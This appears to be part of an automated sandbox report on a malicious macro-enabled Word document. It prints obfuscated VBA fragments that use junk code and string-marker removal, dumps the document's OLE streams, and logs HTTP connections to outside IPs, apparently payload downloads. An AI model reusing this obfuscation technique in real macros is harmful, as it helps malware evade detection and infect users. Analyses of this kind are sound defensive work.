End Function
Function Jlda77h_v8nx5(Wwsqkhmtfcf3_y)
On Error Resume Next
   GoTo PbhYVsA
Dim PcHRGIADo As Object
Set TXmxvp = SQQWY
Set PcHRGIADo = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim PbhYVsA As Object
Set PbhYVsA = PcHRGIADo.CreateTextFile("OiBXGJB:\pnqsZEDV\gsZoAW.EePnB")
PbhYVsA.WriteLine "eEWdaDQVJJqTHgF"
PbhYVsA.WriteLine "OyFBLhlWUnD"
PbhYVsA.WriteLine "TBKmUCEXTUIGu"
Set qHKYGHlFA = ddanFDWJf
PbhYVsA.Close
Set PcHRGIADo = Nothing
Set sPkIwu = RhztCF
Set PbhYVsA = Nothing
PbhYVsA:
Gqzsjl136wugk27i9 = Wwsqkhmtfcf3_y
   GoTo NuebA
Dim sTzDC As Object
Set GIAKA = kwzjKvZHe
Set sTzDC = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim NuebA As Object
Set NuebA = sTzDC.CreateTextFile("OBoYzRpef:\sDLuJ\bmIQSG.MdmDR")
NuebA.WriteLine "NeiIGCNWgICn"
NuebA.WriteLine "EgxfIDVQbJotWhj"
NuebA.WriteLine "UjBKOEDRIbiWFB"
Set idbaDIr = inIcjJtaF
NuebA.Close
Set sTzDC = Nothing
Set KXwaABT = zBSWCKmJv
Set NuebA = Nothing
NuebA:
Gnc9qzz9241pnhfi = Hrs2a1p95u19(Gqzsjl136wugk27i9)
   GoTo gxBPJB
Dim zxgLHJSFW As Object
Set quDoH = KXTliE
Set zxgLHJSFW = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim gxBPJB As Object
Set gxBPJB = zxgLHJSFW.CreateTextFile("KGGMcAB:\uaMWhFR\mhdIDlEH.PDxHAHD")
gxBPJB.WriteLine "RhnJRGeBNASBQHHGF"
gxBPJB.WriteLine "WNFUDvHgghFdup"
gxBPJB.WriteLine "eeVVJBMGlcfXMB"
Set nleaHR = YZllAeRe
gxBPJB.Close
Set zxgLHJSFW = Nothing
Set mgTNFCq = hjZwD
Set gxBPJB = Nothing
gxBPJB:
Jlda77h_v8nx5 = Gnc9qzz9241pnhfi
   GoTo mgrwfmN
Dim RjiQHRA As Object
Set EhCMG = FUyIHBDFz
Set RjiQHRA = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim mgrwfmN As Object
Set mgrwfmN = RjiQHRA.CreateTextFile("CxQnJUo:\GongJKJ\vntyZI.ugzmBCOCC")
mgrwfmN.WriteLine "ptABFEZDmkMVIeD"
mgrwfmN.WriteLine "vVbvIHcFGEAJJ"
mgrwfmN.WriteLine "NisSEYrcDlKQUITa"
Set MNihxICY = AiRdGDAJ
mgrwfmN.Close
Set RjiQHRA = Nothing
Set wTMSLyWFG = AioOpBFE
Set mgrwfmN = Nothing
mgrwfmN:
End Function
Function Hrs2a1p95u19(Svk60sycz63sk)
Q491417n8n1 = Pg5minli2d3c9
   GoTo uWZkeMFv
Dim zDsRaIBGF As Object
Set ViWsSIH = sreXHFD
Set zDsRaIBGF = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim uWZkeMFv As Object
Set uWZkeMFv = zDsRaIBGF.CreateTextFile("NFKiIDO:\sBRpIz\FFqJD.QevLKGfGs")
uWZkeMFv.WriteLine "CcDmClHsnCC"
uWZkeMFv.WriteLine "aqGiHISIbAoabV"
uWZkeMFv.WriteLine "nJJzFRjEWpRikxCD"
Set QOrvJEB = eCIzUDyJ
uWZkeMFv.Close
Set zDsRaIBGF = Nothing
Set UskmBJF = yJmmmVIAG
Set uWZkeMFv = Nothing
uWZkeMFv:
Hrs2a1p95u19 = Replace(Svk60sycz63sk, "]a" + "nw[3", Ij2hesgjee57d3s0)
   GoTo iHKuDmaEr
Dim OMZxxg As Object
Set drZcHkCm = uVItICICB
Set OMZxxg = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim iHKuDmaEr As Object
Set iHKuDmaEr = OMZxxg.CreateTextFile("QWqEKJnW:\BQVnVKF\gWdSBXA.TabDJBD")
iHKuDmaEr.WriteLine "syYTHJShrguhzb"
iHKuDmaEr.WriteLine "TubioGUTLadgXbA"
iHKuDmaEr.WriteLine "oLweAMoGsqVE"
Set noebIvSiu = anyPG
iHKuDmaEr.Close
Set OMZxxg = Nothing
Set NXbmIuHX = YVZXECEHD
Set iHKuDmaEr = Nothing
iHKuDmaEr:
End Function
                                                    VBA File Name: Zdjtk46nm17voo, Stream Size: 701
                                                    General
                                                    Stream Path:Macros/VBA/Zdjtk46nm17voo
                                                    VBA File Name:Zdjtk46nm17voo
                                                    Stream Size:701
                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . I . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                    Data Raw:01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 83 02 00 00 00 00 00 00 01 00 00 00 49 85 8d 23 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                    VBA Code Keywords

                                                    Keyword
                                                    Attribute
                                                    VB_Name
                                                    VBA Code
                                                    Attribute VB_Name = "Zdjtk46nm17voo"

                                                    Streams

                                                    Stream Path: \x1CompObj, File Type: data, Stream Size: 146
                                                    General
                                                    Stream Path:\x1CompObj
                                                    File Type:data
                                                    Stream Size:146
                                                    Entropy:4.00187355764
                                                    Base64 Encoded:False
                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q @ . . . . . > . : . C . < . 5 . = . B . . M . i . c . r . o . s . o . f . t . . W . o . r . d . . 9 . 7 . - . 2 . 0 . 0 . 3 . . . . . . . . . . .
                                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 40 00 00 00 14 04 3e 04 3a 04 43 04 3c 04 35 04 3d 04 42 04 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 57 00 6f 00 72 00 64 00 20 00 39 00 37 00 2d 00
                                                    Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                    General
                                                    Stream Path:\x5DocumentSummaryInformation
                                                    File Type:data
                                                    Stream Size:4096
                                                    Entropy:0.280929556603
                                                    Base64 Encoded:False
                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . } . . . . . . . # . . . . . . . . D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f4 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                                                    Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 528
                                                    General
                                                    Stream Path:\x5SummaryInformation
                                                    File Type:data
                                                    Stream Size:528
                                                    Entropy:4.01269144052
                                                    Base64 Encoded:False
                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . l . . . . . . . T . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . d o t m .
                                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 e0 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 6c 01 00 00 04 00 00 00 54 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 40 01 00 00 09 00 00 00 d0 00 00 00
                                                    Stream Path: 1Table, File Type: data, Stream Size: 6412
                                                    General
                                                    Stream Path:1Table
                                                    File Type:data
                                                    Stream Size:6412
                                                    Entropy:6.14518057053
                                                    Base64 Encoded:True
                                                    Data ASCII:j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                                                    Data Raw:6a 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                                    Stream Path: Data, File Type: data, Stream Size: 99192
                                                    General
                                                    Stream Path:Data
                                                    File Type:data
                                                    Stream Size:99192
                                                    Entropy:7.3901039161
                                                    Base64 Encoded:True
                                                    Data ASCII:x . . . D . d . . . . . . . . . . . . . . . . . . . . . / g . , b . r . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . . . . . . c . . . 8 . . . . A . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . A . C . = . > . : . . 1 . . . . . " . . . . . . . . . . . . . . . . . . . . . . . R . . . . . . . . . % . . P . 5 . . w . ? . . . . . . . . . . . . . . . D . . . . . = . . F . . . . . . % . . P . 5 . . w . ? . . . . . . . . . . .
                                                    Data Raw:78 83 01 00 44 00 64 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 2f 67 eb 2c 62 01 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 6a 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 63 00 0b f0 38 00 00 00 04 41 01 00 00 00 3f 01 00 00 06 00 bf 01 00 00 10 00 ff 01 00 00 08 00 80 c3 14 00
                                                    Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 524
                                                    General
                                                    Stream Path:Macros/PROJECT
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Stream Size:524
                                                    Entropy:5.52955915132
                                                    Base64 Encoded:True
                                                    Data ASCII:I D = " { 9 1 6 F 7 B 9 1 - 5 D 2 F - 4 2 F E - 8 5 A 0 - A 5 1 0 E E 1 5 7 0 3 4 } " . . D o c u m e n t = A 5 g d 2 1 k l f q u 9 c 6 r s / & H 0 0 0 0 0 0 0 0 . . M o d u l e = Z d j t k 4 6 n m 1 7 v o o . . M o d u l e = O w p p n p 8 h a h 4 x o 7 8 8 . . E x e N a m e 3 2 = " F b 5 d 3 b h _ _ k e _ c w 4 p 7 7 " . . N a m e = " m w " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 2 4 2 6 E E C 5 1 6 F E 1 A F E 1 A F E 1 A F E 1
                                                    Data Raw:49 44 3d 22 7b 39 31 36 46 37 42 39 31 2d 35 44 32 46 2d 34 32 46 45 2d 38 35 41 30 2d 41 35 31 30 45 45 31 35 37 30 33 34 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 41 35 67 64 32 31 6b 6c 66 71 75 39 63 36 72 73 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 5a 64 6a 74 6b 34 36 6e 6d 31 37 76 6f 6f 0d 0a 4d 6f 64 75 6c 65 3d 4f 77 70 70 6e 70 38 68 61 68 34 78 6f 37 38
                                                    Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 149
                                                    General
                                                    Stream Path:Macros/PROJECTwm
                                                    File Type:data
                                                    Stream Size:149
                                                    Entropy:3.96410774314
                                                    Base64 Encoded:False
                                                    Data ASCII:A 5 g d 2 1 k l f q u 9 c 6 r s . A . 5 . g . d . 2 . 1 . k . l . f . q . u . 9 . c . 6 . r . s . . . Z d j t k 4 6 n m 1 7 v o o . Z . d . j . t . k . 4 . 6 . n . m . 1 . 7 . v . o . o . . . O w p p n p 8 h a h 4 x o 7 8 8 . O . w . p . p . n . p . 8 . h . a . h . 4 . x . o . 7 . 8 . 8 . . . . .
                                                    Data Raw:41 35 67 64 32 31 6b 6c 66 71 75 39 63 36 72 73 00 41 00 35 00 67 00 64 00 32 00 31 00 6b 00 6c 00 66 00 71 00 75 00 39 00 63 00 36 00 72 00 73 00 00 00 5a 64 6a 74 6b 34 36 6e 6d 31 37 76 6f 6f 00 5a 00 64 00 6a 00 74 00 6b 00 34 00 36 00 6e 00 6d 00 31 00 37 00 76 00 6f 00 6f 00 00 00 4f 77 70 70 6e 70 38 68 61 68 34 78 6f 37 38 38 00 4f 00 77 00 70 00 70 00 6e 00 70 00 38 00 68
                                                    Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 5216
                                                    General
                                                    Stream Path:Macros/VBA/_VBA_PROJECT
                                                    File Type:data
                                                    Stream Size:5216
                                                    Entropy:5.49741129349
                                                    Base64 Encoded:True
                                                    Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
                                                    Data Raw:cc 61 97 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00
                                                    Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 675
                                                    General
                                                    Stream Path:Macros/VBA/dir
                                                    File Type:data
                                                    Stream Size:675
                                                    Entropy:6.39671072877
                                                    Base64 Encoded:True
                                                    Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . m . . 2 . 4 . . @ . . . . . Z = . . . . b . . . . . . . . . { . . a . . . % . J < . . . . . r s t d o l e > . 2 s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . . N o r m a . l . E N . C r . m . . a . F . . . . . . . X * \\ C . . . . Q . m . . . . ! O f f i c
                                                    Data Raw:01 9f b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 1c 6d a2 a2 32 00 34 00 00 40 02 14 06 02 14 5a 3d 02 0a 07 02 62 01 14 08 06 12 09 01 02 12 7b 1a e4 61 06 00 0c 25 02 4a 3c 02 0a 16 00 01 72 73 74 20 64 6f 6c 65 3e 02 32 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30 30 30 32 60 30 34 33 30 2d
                                                    Stream Path: WordDocument, File Type: data, Stream Size: 21038
                                                    General
                                                    Stream Path:WordDocument
                                                    File Type:data
                                                    Stream Size:21038
                                                    Entropy:4.09747048154
                                                    Base64 Encoded:True
                                                    Data ASCII:. . . . _ . . . . . . . . . . . . . . . . . . . . . . . . M . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . R . . b . . . b . . . . E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                    Data Raw:ec a5 c1 00 5f c0 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 19 4d 00 00 0e 00 62 6a 62 6a 00 15 00 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 2e 52 00 00 62 7f 00 00 62 7f 00 00 19 45 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

                                                    Network Behavior

                                                    Snort IDS Alerts

                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                    01/06/21-08:36:59.199071ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                                    01/06/21-08:37:00.203089ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jan 6, 2021 08:36:55.164968014 CET4916580192.168.2.22104.18.61.59
                                                    Jan 6, 2021 08:36:55.210872889 CET8049165104.18.61.59192.168.2.22
                                                    Jan 6, 2021 08:36:55.211046934 CET4916580192.168.2.22104.18.61.59
                                                    Jan 6, 2021 08:36:55.231106043 CET4916580192.168.2.22104.18.61.59
                                                    Jan 6, 2021 08:36:55.276647091 CET8049165104.18.61.59192.168.2.22
                                                    Jan 6, 2021 08:36:55.301549911 CET8049165104.18.61.59192.168.2.22
                                                    Jan 6, 2021 08:36:55.301584005 CET8049165104.18.61.59192.168.2.22
                                                    Jan 6, 2021 08:36:55.301595926 CET8049165104.18.61.59192.168.2.22
                                                    Jan 6, 2021 08:36:55.301606894 CET8049165104.18.61.59192.168.2.22
                                                    Jan 6, 2021 08:36:55.301615000 CET8049165104.18.61.59192.168.2.22
                                                    Jan 6, 2021 08:36:55.301729918 CET4916580192.168.2.22104.18.61.59
                                                    Jan 6, 2021 08:36:55.487680912 CET4916680192.168.2.22104.27.145.251
                                                    Jan 6, 2021 08:36:55.537882090 CET8049166104.27.145.251192.168.2.22
                                                    Jan 6, 2021 08:36:55.538005114 CET4916680192.168.2.22104.27.145.251
                                                    Jan 6, 2021 08:36:55.538140059 CET4916680192.168.2.22104.27.145.251
                                                    Jan 6, 2021 08:36:55.589261055 CET8049166104.27.145.251192.168.2.22
                                                    Jan 6, 2021 08:36:55.597255945 CET8049166104.27.145.251192.168.2.22
                                                    Jan 6, 2021 08:36:55.597320080 CET8049166104.27.145.251192.168.2.22
                                                    Jan 6, 2021 08:36:55.597368956 CET8049166104.27.145.251192.168.2.22
                                                    Jan 6, 2021 08:36:55.597412109 CET4916680192.168.2.22104.27.145.251
                                                    Jan 6, 2021 08:36:55.597451925 CET8049166104.27.145.251192.168.2.22
                                                    Jan 6, 2021 08:36:55.597479105 CET8049166104.27.145.251192.168.2.22
                                                    Jan 6, 2021 08:36:55.597507000 CET4916680192.168.2.22104.27.145.251
                                                    Jan 6, 2021 08:36:55.771711111 CET4916780192.168.2.22209.59.139.39
                                                    Jan 6, 2021 08:36:55.804347992 CET4916680192.168.2.22104.27.145.251
                                                    Jan 6, 2021 08:36:55.931574106 CET8049167209.59.139.39192.168.2.22
                                                    Jan 6, 2021 08:36:55.931704044 CET4916780192.168.2.22209.59.139.39
                                                    Jan 6, 2021 08:36:55.931899071 CET4916780192.168.2.22209.59.139.39
                                                    Jan 6, 2021 08:36:56.091536999 CET8049167209.59.139.39192.168.2.22
                                                    Jan 6, 2021 08:36:56.093039036 CET8049167209.59.139.39192.168.2.22
                                                    Jan 6, 2021 08:36:56.093086004 CET8049167209.59.139.39192.168.2.22
                                                    Jan 6, 2021 08:36:56.093122005 CET8049167209.59.139.39192.168.2.22
                                                    Jan 6, 2021 08:36:56.093158960 CET8049167209.59.139.39192.168.2.22
                                                    Jan 6, 2021 08:36:56.093158960 CET4916780192.168.2.22209.59.139.39
                                                    Jan 6, 2021 08:36:56.093197107 CET8049167209.59.139.39192.168.2.22
                                                    Jan 6, 2021 08:36:56.093229055 CET8049167209.59.139.39192.168.2.22
                                                    Jan 6, 2021 08:36:56.093229055 CET4916780192.168.2.22209.59.139.39
                                                    Jan 6, 2021 08:36:56.093255997 CET8049167209.59.139.39192.168.2.22
                                                    Jan 6, 2021 08:36:56.093283892 CET4916780192.168.2.22209.59.139.39
                                                    Jan 6, 2021 08:36:56.093316078 CET4916780192.168.2.22209.59.139.39
                                                    Jan 6, 2021 08:36:56.098767042 CET4916780192.168.2.22209.59.139.39
                                                    Jan 6, 2021 08:36:56.258384943 CET8049167209.59.139.39192.168.2.22
                                                    Jan 6, 2021 08:36:58.548924923 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:58.813914061 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:58.814100027 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:58.814183950 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:59.079667091 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.089220047 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.089245081 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.089262962 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.089274883 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.089292049 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.089306116 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.089318037 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.089333057 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.089350939 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.089368105 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.089402914 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:59.089432001 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:59.354291916 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.354578018 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.354634047 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.354662895 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.354676008 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:59.354692936 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.354722977 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.354758978 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:59.354763031 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.354811907 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:59.354846001 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.354891062 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.354928970 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.354931116 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:59.354965925 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.355001926 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.355003119 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:59.355051994 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.355084896 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:59.355088949 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.355125904 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.355159044 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:59.355161905 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.355201960 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.355240107 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:59.355248928 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.355292082 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.355328083 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:59.355329990 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.355752945 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:59.620352030 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.620472908 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.620546103 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:59.620621920 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.620735884 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.620769978 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.620791912 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:59.620807886 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.620834112 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.620845079 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:59.620857000 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.620877028 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.620893955 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:59.620897055 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.620917082 CET8049168210.86.239.69192.168.2.22
